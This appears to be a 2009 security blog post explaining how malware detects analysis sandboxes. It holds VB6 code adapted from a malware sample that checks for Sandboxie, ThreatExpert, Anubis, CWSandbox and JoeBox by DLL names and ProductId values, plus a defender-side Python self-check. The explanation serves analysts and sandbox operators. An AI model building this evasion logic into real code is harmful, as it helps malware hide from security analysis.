Friday, January 30, 2009

Sandbox Awareness

Hi there,

Lately malware has picked up new evasion tricks such as sandbox awareness: if a sample finds itself running inside one of the well-known analysis sandboxes, it simply stops executing, so the analyst sees nothing interesting.

Here is a little piece of code taken from a malware sample and adapted (VB6):


' API declarations the snippet needs; these were not part of the original post
Private Const TH32CS_SNAPMODULE As Long = &H8
Private Const HKEY_LOCAL_MACHINE As Long = &H80000002
Private Const KEY_READ As Long = &H20019
Private Const REG_SZ As Long = 1

Private Type MODULEENTRY32
    dwSize As Long
    th32ModuleID As Long
    th32ProcessID As Long
    GlblcntUsage As Long
    ProccntUsage As Long
    modBaseAddr As Long
    modBaseSize As Long
    hModule As Long
    szModule As String * 256    ' MAX_MODULE_NAME32 + 1
    szExePath As String * 260   ' MAX_PATH
End Type

Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, lpme As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As Long, lpme As MODULEENTRY32) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long

Public Function IsInSandbox() As Boolean
    Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
    Dim dwType As Long, cbData As Long
    Dim me32 As MODULEENTRY32
    Dim szBuffer As String * 128

    ' 1) Walk the modules loaded in our own process and look for sandbox DLLs
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)

    me32.dwSize = Len(me32)
    Module32First hSnapShot, me32   ' first entry is the executable itself, so it is skipped

    Do While Module32Next(hSnapShot, me32) <> 0
        If InStr(1, LCase(me32.szModule), "sbiedll.dll") > 0 Then 'Sandboxie
            IsInSandbox = True
        ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll") > 0 Then 'ThreatExpert
            IsInSandbox = True
        End If
    Loop

    CloseHandle hSnapShot

    ' 2) Compare the Windows ProductId with the values hard-coded in well-known sandbox images
    If IsInSandbox = False Then
        ' KEY_READ rather than KEY_ALL_ACCESS: asking for full access fails for a
        ' non-admin user and would silently disable this check
        hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_READ, hKey)
        If hOpen = 0 Then
            dwType = REG_SZ
            cbData = Len(szBuffer)   ' size of the receiving buffer (128)
            hQuery = RegQueryValueEx(hKey, "ProductId", 0, dwType, szBuffer, cbData)
            If hQuery = 0 Then
                If InStr(1, szBuffer, "76487-337-8429955-22614") > 0 Then 'Anubis
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "76487-644-3177037-23510") > 0 Then 'CWSandbox
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "55274-640-2673064-23950") > 0 Then 'JoeBox
                    IsInSandbox = True
                End If
            End If
            RegCloseKey hKey
        End If
    End If
End Function


It detects Sandboxie and ThreatExpert by the DLLs they inject into the analysed process (sbiedll.dll and dbghelp.dll respectively), and Anubis, CWSandbox and JoeBox by the Windows ProductId values their analysis images ship with. Note that dbghelp.dll is a standard Windows library that plenty of legitimate debugging and crash-reporting code loads as well, so that indicator is prone to false positives.
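A defender-side self-check, added here as an example (it is not from the original post nor from the malware it quotes): it carries the post's two indicator tables into Python so a sandbox operator can see which of these checks their own environment trips. classify() is the pure comparison and runs anywhere; loaded_modules() and product_id() collect the real inputs on Windows through Toolhelp32 (ctypes) and winreg, and the script exits when run elsewhere. The function names and the script layout are my own; the sample inputs in the test are constructed.

```python
"""Self-check for the sandbox indicators described in the post (added example)."""
import sys

# Indicator tables taken from the VB6 snippet above.
SANDBOX_MODULES = {
    "sbiedll.dll": "Sandboxie",
    "dbghelp.dll": "ThreatExpert",
}
SANDBOX_PRODUCT_IDS = {
    "76487-337-8429955-22614": "Anubis",
    "76487-644-3177037-23510": "CWSandbox",
    "55274-640-2673064-23950": "JoeBox",
}


def classify(modules, product_id_value):
    """Return the sandbox names whose indicators fire, in detection order.

    modules: iterable of loaded module file names (any case).
    product_id_value: the HKLM\\...\\CurrentVersion\\ProductId string, or None.
    """
    hits = []
    for name in modules:
        lname = name.lower()                      # LCase() in the original
        for needle, tag in SANDBOX_MODULES.items():
            if needle in lname and tag not in hits:   # substring test like InStr()
                hits.append(tag)
    if product_id_value:
        for pid, tag in SANDBOX_PRODUCT_IDS.items():
            if pid in product_id_value and tag not in hits:
                hits.append(tag)
    return hits


def loaded_modules():
    """Enumerate modules of the current process via Toolhelp32 (Windows only)."""
    import ctypes
    from ctypes import wintypes

    TH32CS_SNAPMODULE = 0x8
    INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value

    class MODULEENTRY32(ctypes.Structure):       # ANSI layout, matches the VB6 UDT
        _fields_ = [
            ("dwSize", wintypes.DWORD),
            ("th32ModuleID", wintypes.DWORD),
            ("th32ProcessID", wintypes.DWORD),
            ("GlblcntUsage", wintypes.DWORD),
            ("ProccntUsage", wintypes.DWORD),
            ("modBaseAddr", ctypes.POINTER(ctypes.c_byte)),
            ("modBaseSize", wintypes.DWORD),
            ("hModule", wintypes.HMODULE),
            ("szModule", ctypes.c_char * 256),
            ("szExePath", ctypes.c_char * 260),
        ]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateToolhelp32Snapshot.restype = wintypes.HANDLE
    k32.CreateToolhelp32Snapshot.argtypes = [wintypes.DWORD, wintypes.DWORD]
    for fn in (k32.Module32First, k32.Module32Next):
        fn.restype = wintypes.BOOL
        fn.argtypes = [wintypes.HANDLE, ctypes.POINTER(MODULEENTRY32)]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]

    snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, k32.GetCurrentProcessId())
    if snap == INVALID_HANDLE_VALUE:
        return []
    entry = MODULEENTRY32()
    entry.dwSize = ctypes.sizeof(entry)
    names = []
    ok = k32.Module32First(snap, ctypes.byref(entry))   # unlike the VB6, the exe itself is kept
    while ok:
        names.append(entry.szModule.decode("mbcs", "replace"))
        ok = k32.Module32Next(snap, ctypes.byref(entry))
    k32.CloseHandle(snap)
    return names


def product_id():
    """Read the ProductId value the post's check compares against (Windows only)."""
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            r"Software\Microsoft\Windows\CurrentVersion",
                            0, winreg.KEY_READ) as key:
            value, _ = winreg.QueryValueEx(key, "ProductId")
            return str(value)
    except OSError:
        return None


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("collectors are Windows-only; classify() can still be exercised offline")
    pid = product_id()
    print("ProductId:", pid)
    print("Sandbox indicators:", classify(loaded_modules(), pid) or "none")
```

Run it inside the sandbox image as a plain user; KEY_READ is enough for the registry value. Keep in mind that the ProductId indicator only holds for as long as the image keeps the installation-specific value it was built with: changing that registry value or re-imaging the guest defeats it, which is exactly what a sandbox operator reading this post should do.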
